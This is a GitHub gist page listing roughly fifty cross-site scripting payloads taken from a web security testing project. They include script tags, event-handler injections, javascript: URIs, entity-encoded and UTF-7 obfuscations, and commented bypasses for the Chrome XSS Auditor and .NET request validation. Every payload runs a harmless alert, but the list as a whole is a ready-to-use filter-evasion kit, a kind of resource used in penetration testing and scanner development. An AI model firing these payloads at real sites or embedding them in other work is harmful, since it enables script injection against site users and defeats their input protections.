Skip to content

Instantly share code, notes, and snippets.

@deadbits

deadbits/xss_all.txt

Last active December 12, 2015 08:49
Show Gist options
  • Save deadbits/4747103 to your computer and use it in GitHub Desktop.
Save deadbits/4747103 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
xss_all.txt
Useful XSS techniques taken from the Cross project by thesp0nge @ http://travis-ci.org/thesp0nge/cross
"<script>alert('pwned!');</script>",
"/--><script>alert('pwned!');</script>",
"/--></ScRiPt><ScRiPt>alert('pwned!');</ScRiPt>",
"//;-->alert('pwned!');",
"\"//;\nalert('pwned!');",
"<script/anyjunk>alert('pwned!')</script>",
"<<script>alert('pwned!');//<</script>",
"<img onerror=alert('pwned!') src=a>",
"<xml onreadystatechange=alert('pwned!')>",
"<style onreadystatechange=alert('pwned!')>",
"<iframe onreadystatechange=alert('pwned!')>",
"<object onerror=alert('pwned!')>",
"<object type=image src=/images/live.gif onreadystatechange=alert('pwned!')></object>",
"<img type=image src=/images/live.gif onreadystatechange=alert('pwned!')>",
"<input type=image src=/images/live.gif onreadystatechange=alert('pwned!')>",
"<isindex type=image src=/images/live.gif onreadystatechange=alert('pwned!')>",
"<script onreadystatechange=alert('pwned!')>",
"<bgsound onpropertychange=alert('pwned!')>",
"<body onbeforeactivate=alert('pwned!')>",
"<body onfocusin=alert('pwned!')>",
"<input autofocus onfocus=alert('pwned!')>",
"<input onblur=alert('pwned!') autofocus><input autofocus>",
"<body onscroll=alert('pwned!')><br><br>...<br><input autofocus>",
"</a onmousemove=alert('pwned!')>",
"<video src=1 onerror=alert('pwned!')>",
"<audio src=1 onerror=alert('pwned!')>",
"<object data=javascript:alert('pwned!')>",
"<iframe src=javascript:alert('pwned!')>",
"<embed src=javascript:alert('pwned!')>",
"<form id=test /><button form=test formaction=javascript:alert('pwned!')>",
"<event-source src=javascript:alert('pwned!')>",
"<x style=behavior:url(#default#time2) onbegin=alert('pwned!')>",
"<x style=x:expression(alert('pwned!'))>",
"<x onclick=alert('pwned!') src=a>Click here</x>",
"<img onerror=\"alert('pwned!')\"src=a>",
"<img onerror=`alert('pwned!')`src=a>",
"<img/onerror=\"alert('pwned!')\"src=a>",
"<img onerror=a&#x6c;ert('pwned!') src=a>",
"<img onerror=a&#x06c;ert('pwned!') src=a>",
"<img onerror=a&#x006c;ert('pwned!') src=a>",
"<img onerror=a&#x0006c;ert('pwned!') src=a>",
"<img onerror=a&#108;ert('pwned!') src=a>",
"<img onerror=a&#0108;ert('pwned!') src=a>",
"<img onerror=a&#0108;ert('pwned!') src=a>",
"<img onerror=a&#108ert('pwned!') src=a>",
"<img onerror=a&#0108ert('pwned!') src=a>",
"<script>function::['alert']('pwned!')</script>",
"<svg><script>//&#x0A;alert('pwned!')</script>", #Chrome <= 18 XssAuditor bypass
"<script>/*///*/alert('pwned!');</script>", #Chrome <= 20 XssAuditor bypass
"<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('pwned!'))>", #.NET RequestValidator bypass
"+ADw-script+AD4-alert('pwned!')+ADw-/script+AD4-", # UTF-7
"},alert('pwned!'),function x(){//", # DOM breaker
"\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3ealert('pwned!')\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e" #DOM-based innerHTML injection
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment